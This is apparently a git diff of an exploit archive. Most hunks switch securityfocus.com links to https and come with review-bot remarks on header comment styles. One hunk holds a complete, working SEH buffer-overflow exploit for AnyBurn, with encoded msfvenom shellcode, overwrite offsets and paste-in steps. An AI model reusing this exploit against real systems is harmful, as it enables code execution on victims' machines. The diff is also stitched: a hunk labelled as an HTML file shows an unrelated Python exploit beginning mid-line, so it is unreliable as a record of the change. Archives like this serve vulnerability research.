@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26291/info +source: https://www.securityfocus.com/bid/26291/info CONTENTCustomizer is prone to an information-disclosure vulnerability. 
diff --git a/exploits/php/webapps/30733.txt b/exploits/php/webapps/30733.txt index 0b27f9489..072903950 100644 --- a/exploits/php/webapps/30733.txt +++ b/exploits/php/webapps/30733.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26301/info +source: https://www.securityfocus.com/bid/26301/info phpMyAdmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30734.txt b/exploits/php/webapps/30734.txt index dcca91e79..91998f688 100644 --- a/exploits/php/webapps/30734.txt +++ b/exploits/php/webapps/30734.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26312/info +source: https://www.securityfocus.com/bid/26312/info Helios Calendar is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30737.txt b/exploits/php/webapps/30737.txt index 37dc99784..77981a292 100644 --- a/exploits/php/webapps/30737.txt +++ b/exploits/php/webapps/30737.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26329/info +source: https://www.securityfocus.com/bid/26329/info Galmeta Post is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30738.txt b/exploits/php/webapps/30738.txt index 1ba525b14..3fe2eb8d2 100644 --- a/exploits/php/webapps/30738.txt +++ b/exploits/php/webapps/30738.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26330/info +source: https://www.securityfocus.com/bid/26330/info E-Vendejo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30739.txt b/exploits/php/webapps/30739.txt index b72958225..884774831 100644 --- a/exploits/php/webapps/30739.txt +++ b/exploits/php/webapps/30739.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26331/info +source: https://www.securityfocus.com/bid/26331/info JLMForo System is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30741.txt b/exploits/php/webapps/30741.txt index 59082269f..83843491f 100644 --- a/exploits/php/webapps/30741.txt +++ b/exploits/php/webapps/30741.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26335/info +source: https://www.securityfocus.com/bid/26335/info easyGB is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30745.html b/exploits/php/webapps/30745.html index 346e16383..b87be2ddc 100644 --- a/exploits/php/webapps/30745.html +++ b/exploits/php/webapps/30745.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26358/info +source: https://www.securityfocus.com/bid/26358/info MS-TopSites is prone to an unauthorized-access vulnerability and an HTML-injection vulnerability because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30746.txt b/exploits/php/webapps/30746.txt index 37d641dc4..950df1708 100644 --- a/exploits/php/webapps/30746.txt +++ b/exploits/php/webapps/30746.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26375/info +source: https://www.securityfocus.com/bid/26375/info Computer Associates SiteMinder Web Agent is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30748.txt b/exploits/php/webapps/30748.txt index 01fad15b1..7e0a3051b 100644 --- a/exploits/php/webapps/30748.txt +++ b/exploits/php/webapps/30748.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26392/info +source: https://www.securityfocus.com/bid/26392/info Xoops Mylinks module is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/30750.pl b/exploits/php/webapps/30750.pl index c02b9329c..1a4652eb5 100755 --- a/exploits/php/webapps/30750.pl +++ b/exploits/php/webapps/30750.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26406/info +source: https://www.securityfocus.com/bid/26406/info The PHP-Nuke Advertising Module is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/30751.html b/exploits/php/webapps/30751.html index 4a843a6d3..e89a3a77c 100644 --- a/exploits/php/webapps/30751.html +++ b/exploits/php/webapps/30751.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26407/info +source: https://www.securityfocus.com/bid/26407/info Miro Broadcast Machine is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30754.txt b/exploits/php/webapps/30754.txt index 452e39840..9efa4d2cf 100644 --- a/exploits/php/webapps/30754.txt +++ b/exploits/php/webapps/30754.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26411/info +source: https://www.securityfocus.com/bid/26411/info AutoIndex PHP Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/30757.txt b/exploits/php/webapps/30757.txt index a692b5760..ddf45c591 100644 --- a/exploits/php/webapps/30757.txt +++ b/exploits/php/webapps/30757.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26417/info +source: https://www.securityfocus.com/bid/26417/info X7 Chat is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30758.txt b/exploits/php/webapps/30758.txt index 61f564b96..f26022252 100644 --- a/exploits/php/webapps/30758.txt +++ b/exploits/php/webapps/30758.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26417/info +source: https://www.securityfocus.com/bid/26417/info X7 Chat is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30762.txt b/exploits/php/webapps/30762.txt index 022a4fa78..fe1a533bf 100644 --- a/exploits/php/webapps/30762.txt +++ b/exploits/php/webapps/30762.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26432/info +source: https://www.securityfocus.com/bid/26432/info WP-SlimStat Plugin for WordPress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30764.txt b/exploits/php/webapps/30764.txt index 6b5218efe..dee1bae78 100644 --- a/exploits/php/webapps/30764.txt +++ b/exploits/php/webapps/30764.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26437/info +source: https://www.securityfocus.com/bid/26437/info CONTENTCustomizer is prone to an unauthorized access vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30774.txt b/exploits/php/webapps/30774.txt index a556cb67b..5264bd822 100644 --- a/exploits/php/webapps/30774.txt +++ b/exploits/php/webapps/30774.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26470/info +source: https://www.securityfocus.com/bid/26470/info Liferay Portal is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30792.html b/exploits/php/webapps/30792.html index 87190c128..67bef28b4 100644 --- a/exploits/php/webapps/30792.html +++ b/exploits/php/webapps/30792.html 
@@ -1,5 +1,5 @@ 20ac, 81 --> 81 +# 82 --> 201a, 83 --> 0192 +# 84 --> 201e, 85 --> 2026 +# 86 --> 2020, 87 --> 2021 +# 88 --> 02c6, 89 --> 2030 +# 8a --> 0160, 8b --> 2039 +# 8c --> 0152, 8d --> 8d +# 8e --> 017d, 8f --> 8f +# 90 --> 90 , 91 --> 2018 +# 92 --> 2019, 93 --> 201c +# 94 --> 201d, 95 --> 2022 +# 96 --> 2013, 97 --> 2014 +# 98 --> 02dc, 99 --> 2122 +# 9a --> 0161, 9b --> 203a +# 9c --> 0153, 9d --> 9d +# 9e --> 017e, 9f --> 0178 +# +# PoC +# 1.) Generate sploit_anyBURN_seh_unicode.txt, copy the contents to clipboard +# 2.) In the application, open 'Copy disc to image file' +# 3.) Paste the contents of the TXT file in 'Image file name' +# 4.) Click "Create Now" and watch Anyburn BURN! + +import sys, struct + +filename = "sploit_anyburn_seh_unicode.txt" + +# Maximum length +maxlen = 10000 + +# Shellcode +# msfvenom -p windows/exec cmd=calc.exe -e x86/unicode_mixed -f python -b "\x00\x0a\x0d" -v shellcode bufferregister=eax +# Size 512 +shellcode = "" +shellcode += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41" +shellcode += "\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" +shellcode += "\x49\x41\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51" +shellcode += "\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59" +shellcode += "\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68" +shellcode += "\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31" +shellcode += "\x31\x41\x49\x41\x49\x41\x42\x41\x42\x41\x42\x51" +shellcode += "\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31" +shellcode += "\x31\x41\x49\x41\x4a\x51\x59\x41\x5a\x42\x41\x42" +shellcode += "\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39" +shellcode += "\x75\x34\x4a\x42\x79\x6c\x39\x58\x35\x32\x6d\x30" +shellcode += "\x4b\x50\x6b\x50\x73\x30\x64\x49\x4b\x35\x4e\x51" +shellcode += "\x35\x70\x61\x54\x74\x4b\x6e\x70\x6e\x50\x64\x4b" +shellcode += "\x61\x42\x7a\x6c\x72\x6b\x62\x32\x6d\x44\x64\x4b" +shellcode += "\x44\x32\x6b\x78\x5a\x6f\x45\x67\x6f\x5a\x6b\x76" +shellcode += 
"\x4d\x61\x49\x6f\x34\x6c\x4f\x4c\x43\x31\x71\x6c" +shellcode += "\x39\x72\x4e\x4c\x4b\x70\x49\x31\x38\x4f\x4c\x4d" +shellcode += "\x6a\x61\x76\x67\x67\x72\x58\x72\x31\x42\x62\x37" +shellcode += "\x64\x4b\x50\x52\x7a\x70\x32\x6b\x4f\x5a\x4f\x4c" +shellcode += "\x42\x6b\x70\x4c\x6b\x61\x34\x38\x7a\x43\x51\x38" +shellcode += "\x6d\x31\x78\x51\x6f\x61\x52\x6b\x30\x59\x6f\x30" +shellcode += "\x4b\x51\x79\x43\x72\x6b\x4f\x59\x5a\x78\x68\x63" +shellcode += "\x6c\x7a\x30\x49\x62\x6b\x4e\x54\x42\x6b\x6b\x51" +shellcode += "\x4a\x36\x4c\x71\x6b\x4f\x44\x6c\x46\x61\x78\x4f" +shellcode += "\x4c\x4d\x69\x71\x56\x67\x6c\x78\x57\x70\x63\x45" +shellcode += "\x59\x66\x6a\x63\x51\x6d\x4a\x58\x4d\x6b\x71\x6d" +shellcode += "\x4e\x44\x52\x55\x4b\x34\x42\x38\x54\x4b\x4e\x78" +shellcode += "\x6b\x74\x79\x71\x79\x43\x53\x36\x74\x4b\x4a\x6c" +shellcode += "\x50\x4b\x34\x4b\x31\x48\x4d\x4c\x69\x71\x57\x63" +shellcode += "\x72\x6b\x4a\x64\x74\x4b\x69\x71\x78\x50\x31\x79" +shellcode += "\x50\x44\x6d\x54\x6c\x64\x71\x4b\x51\x4b\x70\x61" +shellcode += "\x72\x39\x70\x5a\x30\x51\x39\x6f\x6b\x30\x61\x4f" +shellcode += "\x31\x4f\x6f\x6a\x32\x6b\x4d\x42\x4a\x4b\x72\x6d" +shellcode += "\x4f\x6d\x51\x5a\x39\x71\x42\x6d\x75\x35\x75\x62" +shellcode += "\x4d\x30\x59\x70\x4d\x30\x70\x50\x33\x38\x6e\x51" +shellcode += "\x52\x6b\x42\x4f\x53\x57\x6b\x4f\x46\x75\x55\x6b" +shellcode += "\x6a\x50\x46\x55\x33\x72\x4f\x66\x62\x48\x66\x46" +shellcode += "\x72\x75\x65\x6d\x43\x6d\x39\x6f\x67\x65\x6d\x6c" +shellcode += "\x39\x76\x61\x6c\x4a\x6a\x31\x70\x59\x6b\x79\x50" +shellcode += "\x74\x35\x49\x75\x35\x6b\x6f\x57\x6e\x33\x72\x52" +shellcode += "\x62\x4f\x70\x6a\x39\x70\x42\x33\x39\x6f\x49\x45" +shellcode += "\x42\x43\x4f\x71\x52\x4c\x70\x63\x4c\x6e\x30\x65" +shellcode += "\x51\x68\x51\x55\x49\x70\x41\x41" + +# Align reg EBP to RET into EAX +# EBP = 0x04f6acb8, Buffer = 0x04f6b70a, Buffer - EBP = 0x0a52 --> 0x0b00 +align_ebp = ( + "\x73" # Padding + "\x55" # PUSH EBP + "\x73" # Padding + "\x58" # POP EAX + 
"\x73" # Padding + "\x05\x0f\x11" # "\x05\x00\x0f\x00\x11" # 05000f0011 add eax,0x11000f00 --\ + "\x73" # Padding |--> Adds 0x0b00 bytes + "\x2d\x04\x11" # "\x2d\x00\x04\x00\x11" # 2d00040011 sub eax,0x11000400 --/ + "\x73" # Padding + "\x50" # PUSH EAX + "\x73" # Padding + "\xc3" # RET +) + +# Offsets +crash_nseh = 9197 # NSEH, might be different on other Windows version/SP +crash_seh = crash_nseh + 4 # SEH +ret_jmp = 87 # Offset for which the 'align_ebp' instructions land + +# Variables +prefix = "\x73" * ret_jmp # Padding +prefix += shellcode # UNICODE encoded shellcode +prefix += "\x73" * (crash_nseh - len(prefix)) # Additional padding to reach NSEH +nseh = "\x83\x43" # 0x83 Expands to 0x0192 --> XCHG EAX,EDX # Expanded instruction in SEH now does get executed due to swapped regs +seh = "\x95\x47" # 0x00470095 Expands to 0x00472022 --> # POP POP RET # AnyBurn.exe +suffix = align_ebp # Align registers to jump to beginning of buffer +suffix += "\x73" * (maxlen - len(prefix + nseh + seh + suffix)) # Padding + +# Crafting payload +payload = prefix + nseh + seh + suffix + +# Create file +f = open(filename, 'wb') +f.write(payload) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/4839.pl b/exploits/windows/local/4839.pl index 511b89f75..6d8770391 100755 --- a/exploits/windows/local/4839.pl +++ b/exploits/windows/local/4839.pl @@ -4,7 +4,7 @@ # Web:: http://coolplayer.sourceforge.net/ # Playlist(.m3u) File Local Buffer Overflow Exploit # -# Vuln: http://www.securityfocus.com/bid/21396 +# Vuln: https://www.securityfocus.com/bid/21396 # # # Greetz: Luigi Auriemma que ha descubierto una nueva vulnerabilidad en este software junto diff --git a/exploits/windows/local/559.c b/exploits/windows/local/559.c index 4640864c7..e0c8d3902 100644 --- a/exploits/windows/local/559.c +++ b/exploits/windows/local/559.c @@ -1,4 +1,3 @@ - /* -------------------------------Advisory---------------------------------- Luigi Auriemma 
diff --git a/exploits/windows/local/8010.pl b/exploits/windows/local/8010.pl index 60456276a..9112648d6 100755 --- a/exploits/windows/local/8010.pl +++ b/exploits/windows/local/8010.pl @@ -3,7 +3,7 @@ # FeedDemon version 2.7.0.0 Buffer overFlow # Reference: # http://security.bkis.vn/?p=329 -# http://www.securityfocus.com/bid/33630/info +# https://www.securityfocus.com/bid/33630/info # http://secunia.com/advisories/33718/ # Tested in Windows XP Sp2 (English) # Created by cenjan (xcenjanx@yahoo.com) diff --git a/exploits/windows/remote/10054.txt b/exploits/windows/remote/10054.txt index a5eef74c5..dfbd2cae0 100644 --- a/exploits/windows/remote/10054.txt +++ b/exploits/windows/remote/10054.txt @@ -18,7 +18,7 @@ This component and included in default SAPGUI installation. Details ******* -Information about this vulnerability in public since 2007 (http://www.securityfocus.com/bid/26467/info) +Information about this vulnerability in public since 2007 (https://www.securityfocus.com/bid/26467/info) We found that wulnerable component VSFlexGrid is still not patched and is using in default SAP GUI Client installations Tested on: @@ -95,7 +95,7 @@ References http://dsecrg.com/pages/vul/show.php?id=117 https://service.sap.com/sap/support/notes/1327004 https://service.sap.com/sap/support/notes/1092631 -http://www.securityfocus.com/bid/26467/info +https://www.securityfocus.com/bid/26467/info About diff --git a/exploits/windows/remote/1184.c b/exploits/windows/remote/1184.pl old mode 100644 new mode 100755 similarity index 100% rename from exploits/windows/remote/1184.c rename to exploits/windows/remote/1184.pl diff --git a/exploits/windows/remote/12312.rb b/exploits/windows/remote/12312.rb index 89caa42d7..c4a45a3e1 100755 --- a/exploits/windows/remote/12312.rb +++ b/exploits/windows/remote/12312.rb 
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://seclists.org/bugtraq/2010/Feb/202' ], [ 'URL', 'http://code.google.com/p/easyftpsvr/'], [ 'URL', 'https://tegosecurity.com/etc/return_overwrite/RCE_easy_ftp_server_1.7.0.2.zip' ], - [ 'URL', 'http://www.securityfocus.com/bid/38262/exploit'] + [ 'URL', 'https://www.securityfocus.com/bid/38262/exploit'] ], 'Privileged' => false, 'Payload' => diff --git a/exploits/windows/remote/1279.pm b/exploits/windows/remote/1279.pm index 930b3cc78..e823be946 100644 --- a/exploits/windows/remote/1279.pm +++ b/exploits/windows/remote/1279.pm @@ -38,7 +38,7 @@ my $info = }), 'Refs' => [ - ['URL ', "http://www.securityfocus.com/bid/15131"], + ['URL ', "https://www.securityfocus.com/bid/15131"], ], 'Targets' => [ diff --git a/exploits/windows/remote/15991.html b/exploits/windows/remote/15991.html index e62715635..7add83421 100644 --- a/exploits/windows/remote/15991.html +++ b/exploits/windows/remote/15991.html @@ -1,4 +1,4 @@ -Sources: http://www.securityfocus.com/bid/44443/info +Sources: https://www.securityfocus.com/bid/44443/info http://packetstormsecurity.org/files/view/97522/recordingmanager-ie.txt diff --git a/exploits/windows/remote/16737.rb b/exploits/windows/remote/16737.rb index 482ac335b..eb08fb70a 100755 --- a/exploits/windows/remote/16737.rb +++ b/exploits/windows/remote/16737.rb @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://seclists.org/bugtraq/2010/Feb/202' ], [ 'URL', 'http://code.google.com/p/easyftpsvr/'], [ 'URL', 'https://tegosecurity.com/etc/return_overwrite/RCE_easy_ftp_server_1.7.0.2.zip' ], - [ 'URL', 'http://www.securityfocus.com/bid/38262/exploit'] + [ 'URL', 'https://www.securityfocus.com/bid/38262/exploit'] ], 'Privileged' => false, 'Payload' => diff --git a/exploits/windows/remote/1787.py b/exploits/windows/remote/1787.py index 7dc358e1f..db8ffc70f 100755 --- a/exploits/windows/remote/1787.py +++ b/exploits/windows/remote/1787.py 
@@ -13,7 +13,7 @@ Code tasted against freeSSHd version 1.0.9 If you didn't get shell at first try, try few times and you will get lucky Advisories: -http://www.securityfocus.com/bid/17958 +https://www.securityfocus.com/bid/17958 http://www.frsirt.com/english/advisories/2006/1786 """ diff --git a/exploits/windows/remote/18089.rb b/exploits/windows/remote/18089.rb index c05823de8..42ebd7c23 100755 --- a/exploits/windows/remote/18089.rb +++ b/exploits/windows/remote/18089.rb @@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Version' => '$Revision: 0 $', 'References' => [ - [ 'URL', 'http://www.securityfocus.com/bid/49427'], + [ 'URL', 'https://www.securityfocus.com/bid/49427'], ], 'Privileged' => false, 'Payload' => diff --git a/exploits/windows/remote/18365.rb b/exploits/windows/remote/18365.rb index 6c922dbf7..773153b72 100755 --- a/exploits/windows/remote/18365.rb +++ b/exploits/windows/remote/18365.rb @@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote ['MSB', 'MS05-054'], ['CVE', '2005-1790'], ['OSVDB', '17094'], - ['URL', 'http://www.securityfocus.com/bid/13799/info'], + ['URL', 'https://www.securityfocus.com/bid/13799/info'], ['URL', 'http://www.cvedetails.com/cve/CVE-2005-1790'], ], 'DefaultOptions' => diff --git a/exploits/windows/remote/19083.cpp b/exploits/windows/remote/19083.cpp index 42c1a358d..9d72531fa 100644 --- a/exploits/windows/remote/19083.cpp +++ b/exploits/windows/remote/19083.cpp @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/106/info +source: https://www.securityfocus.com/bid/106/info It is possible to run arbitrary code on any Intel machine running Cheyenne Inoculan version 4.0 for Windows NT prior to SP2. diff --git a/exploits/windows/remote/19094.txt b/exploits/windows/remote/19094.txt index 19cd8c1eb..eb0c497de 100644 --- a/exploits/windows/remote/19094.txt +++ b/exploits/windows/remote/19094.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/116/info +source: https://www.securityfocus.com/bid/116/info Vulnerabilities in an ActiveX control distributed with Internet Explorer 5 and available for Internet Explorer 4 allow malicous web sites to steal local files and to bypass cross-frame security rules. diff --git a/exploits/windows/remote/19113.txt b/exploits/windows/remote/19113.txt index 472ebf681..b1e2c6997 100644 --- a/exploits/windows/remote/19113.txt +++ b/exploits/windows/remote/19113.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/140/info +source: https://www.securityfocus.com/bid/140/info A vulnerability exists within Microsoft's Telnetd daemon which allows a denial of service condition. The popular scanning tool, Nmap 2.01 or later can crash telnetd services when using the SYN scanning flag (-sS). diff --git a/exploits/windows/remote/19147.txt b/exploits/windows/remote/19147.txt index 2c9235d4c..4e4eb8f45 100644 --- a/exploits/windows/remote/19147.txt +++ b/exploits/windows/remote/19147.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/189/info +source: https://www.securityfocus.com/bid/189/info Web-based administration for IIS 4.0 is, by default, limited to the local loopback address, 127.0.0.1. In instances where IIS4.0 was installed as an upgrade to IIS 2.0 or 3.0, a legacy ISAPI DLL (ISM.DLL) is left in the /scripts/iisadmin directory. An attacker may call this DLL via the following syntax: diff --git a/exploits/windows/remote/19149.c b/exploits/windows/remote/19149.c index 05daeacb7..dd67042dd 100644 --- a/exploits/windows/remote/19149.c +++ b/exploits/windows/remote/19149.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/191/info +// source: https://www.securityfocus.com/bid/191/info An http get request against an IIS4 server will not be logged if the request is longer than 10150 bytes long. 
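Review bot: In the 19149.c hunk, prefixing only line 1 with `//` does not make the header valid C, because the description on the following context line ("An http get request against an IIS4 server will not be logged ...") is still bare prose at file scope. Either wrap the whole header in `/* ... */`, as 19224.c and 19486.c already do in this patch, or leave the line as plain `source:` so the change stays a pure URL-scheme update. The same applies to the other .c files that receive the `// source:` treatment here (19248.c, 19448.c, 19449.c, 19450.c, 19494.c, 19495.c, 19496.c), and 19083.cpp is handled differently again: its `source:` line gets no comment prefix at all.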
diff --git a/exploits/windows/remote/19152.txt b/exploits/windows/remote/19152.txt index 6b9b41703..086037c06 100644 --- a/exploits/windows/remote/19152.txt +++ b/exploits/windows/remote/19152.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/194/info +source: https://www.securityfocus.com/bid/194/info A GET request that specifies a nonexistent file with an IISAPI-registered extension (ie .pl, .idq) will cause the IIS server to return an error message that includes the full path of the root web server directory. diff --git a/exploits/windows/remote/19156.txt b/exploits/windows/remote/19156.txt index d190e5875..1f9636423 100644 --- a/exploits/windows/remote/19156.txt +++ b/exploits/windows/remote/19156.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/197/info +source: https://www.securityfocus.com/bid/197/info On January 28, 1999, Georgi Guninski originally reported a vulnerability in Internet Explorer 4.x. Internet Explorer 4.x's implentation of Cross-frame security could be bypassed if "%01" is appended to an arbitrary URL. If the specially malformed URL is inserted in a javascript after an 'about:' statement, arbitrary code can be executed on the target host. Successful exploitation could lead to access to local files, window spoofing, and arbitrary code execution. diff --git a/exploits/windows/remote/19164.txt b/exploits/windows/remote/19164.txt index 4378e8780..a9477eb78 100644 --- a/exploits/windows/remote/19164.txt +++ b/exploits/windows/remote/19164.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/215/info +source: https://www.securityfocus.com/bid/215/info The Windows clipboard contains data that has been cut or copied from various windows applications. This data can be accessed and posted to malicious web forms at web sites without the knowledge of the visiting end-user. Normally, Microsoft security prevents forms from accessing data other than what was copied from within the same application, however, a Microsoft Forms 2.0 TextBox ActiveX object can bypass these security rules. diff --git a/exploits/windows/remote/19197.txt b/exploits/windows/remote/19197.txt index 0a304535c..a0e9f04bd 100644 --- a/exploits/windows/remote/19197.txt +++ b/exploits/windows/remote/19197.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/233/info +source: https://www.securityfocus.com/bid/233/info A modified SMB client can mount shares on an SMB host by passing the username and corresponding LanMan hash of an account that is authorized to access the host and share. The modified SMB client removes the need for the user to "decrypt" the password hash into its clear-text equivalent. diff --git a/exploits/windows/remote/19208.txt b/exploits/windows/remote/19208.txt index b27d8661f..6867a79d8 100644 --- a/exploits/windows/remote/19208.txt +++ b/exploits/windows/remote/19208.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/256/info +source: https://www.securityfocus.com/bid/256/info A vulnerability in Microsoft Site Server's Ad Server Sample directory allows the retrieval of a site's configuration file (SITE.CSC) which contains sensitive information pertaining to an SQL database. diff --git a/exploits/windows/remote/19224.c b/exploits/windows/remote/19224.c index 04a9b5daf..654f838dd 100644 --- a/exploits/windows/remote/19224.c +++ b/exploits/windows/remote/19224.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/281/info +source: https://www.securityfocus.com/bid/281/info A vulnerability in Computalynx's CMail allows remote malicious users to steal local files. diff --git a/exploits/windows/remote/19239.txt b/exploits/windows/remote/19239.txt index cf0ae3f40..808023228 100644 --- a/exploits/windows/remote/19239.txt +++ b/exploits/windows/remote/19239.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/299/info +source: https://www.securityfocus.com/bid/299/info The full physical path name for the IIS web server root directory may be obtained by attempting to view a non-existent .IDC file. The web server will return an error message that lists the absolute pathname of the "missing" .IDC file. diff --git a/exploits/windows/remote/19245.pl b/exploits/windows/remote/19245.pl index 21569300a..f4dd88fa3 100755 --- a/exploits/windows/remote/19245.pl +++ b/exploits/windows/remote/19245.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/307/info +source: https://www.securityfocus.com/bid/307/info Microsoft IIS reported prone to a buffer overflow vulnerability in the way IIS handles requests for several file types that require server side processing. This vulnerability may allow a remote attacker to execute arbitrary code on the target machine. diff --git a/exploits/windows/remote/19246.pm b/exploits/windows/remote/19246.pm index 8ed8fa9b5..75dc34935 100644 --- a/exploits/windows/remote/19246.pm +++ b/exploits/windows/remote/19246.pm @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/307/info +source: https://www.securityfocus.com/bid/307/info Microsoft IIS reported prone to a buffer overflow vulnerability in the way IIS handles requests for several file types that require server side processing. This vulnerability may allow a remote attacker to execute arbitrary code on the target machine. 
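Review bot: The 19246.pm hunk leaves `source: https://www.securityfocus.com/bid/307/info` and the description after it as uncommented text at the top of a Perl module, while 19248.c for the same BID gains a `//` prefix in this patch. If the intent is to turn these headers into comments, use `# source:` here and in 19245.pl and comment the description lines as well, the way the 19435.html header already prefixes every line with `#`. If the intent is only the http to https change, drop the `//` additions from the .c files so that all headers are treated the same way.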
diff --git a/exploits/windows/remote/19248.c b/exploits/windows/remote/19248.c index 35123d1b8..2817295cb 100644 --- a/exploits/windows/remote/19248.c +++ b/exploits/windows/remote/19248.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/307/info +// source: https://www.securityfocus.com/bid/307/info Microsoft IIS reported prone to a buffer overflow vulnerability in the way IIS handles requests for several file types that require server side processing. This vulnerability may allow a remote attacker to execute arbitrary code on the target machine. diff --git a/exploits/windows/remote/19361.txt b/exploits/windows/remote/19361.txt index d07dc5f7b..044a17d09 100644 --- a/exploits/windows/remote/19361.txt +++ b/exploits/windows/remote/19361.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/477/info +source: https://www.securityfocus.com/bid/477/info This vulnerability could allow a web site viewer to obtain the source code for .asp and similar files if the server's default language (Input Locale) is set to Chinese, Japanese or Korean. How this works is as follows: diff --git a/exploits/windows/remote/19424.pl b/exploits/windows/remote/19424.pl index 348b76bc1..75251cd94 100755 --- a/exploits/windows/remote/19424.pl +++ b/exploits/windows/remote/19424.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/529/info +source: https://www.securityfocus.com/bid/529/info MDAC (Microsoft Data Access Components) is a package used to integrate web and database services. It includes a component named RDS (Remote Data Services). RDS allows remote access via the internet to database objects through IIS. Both are included in a default installation of the Windows NT 4.0 Option Pack, but can be excluded via a custom installation. diff --git a/exploits/windows/remote/19435.html b/exploits/windows/remote/19435.html index 9aedee811..d5f7ee5df 100644 --- a/exploits/windows/remote/19435.html +++ b/exploits/windows/remote/19435.html 
@@ -1,4 +1,4 @@ -# source: http://www.securityfocus.com/bid/548/info +# source: https://www.securityfocus.com/bid/548/info # # A vulnerability affects Microsoft's Jet 3.51 and 4.0 driver (MSJET35.DLL and MSJET40.DLL). # diff --git a/exploits/windows/remote/19442.html b/exploits/windows/remote/19442.html index 0df29de2e..1476a7b2e 100644 --- a/exploits/windows/remote/19442.html +++ b/exploits/windows/remote/19442.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/557/info +source: https://www.securityfocus.com/bid/557/info Some Compaq computers come with a Java applet called SpawnApp. This applet is used to run Compaq diagnostic utilities from the local hard drive when certain Compaq websites are viewed. The problem is that the applet can run any program, and can be used by any webpage. This applet is signed as secure by Compaq. diff --git a/exploits/windows/remote/19448.c b/exploits/windows/remote/19448.c index fd775a98f..1b824e41e 100644 --- a/exploits/windows/remote/19448.c +++ b/exploits/windows/remote/19448.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/572/info +// source: https://www.securityfocus.com/bid/572/info ToxSoft's shareware FTP client, NextFTP, contains an unchecked buffer in the code that parses CWD command replies. If the FTP server's reply contains the exploit code, arbitrary commands can be run on the client machine. diff --git 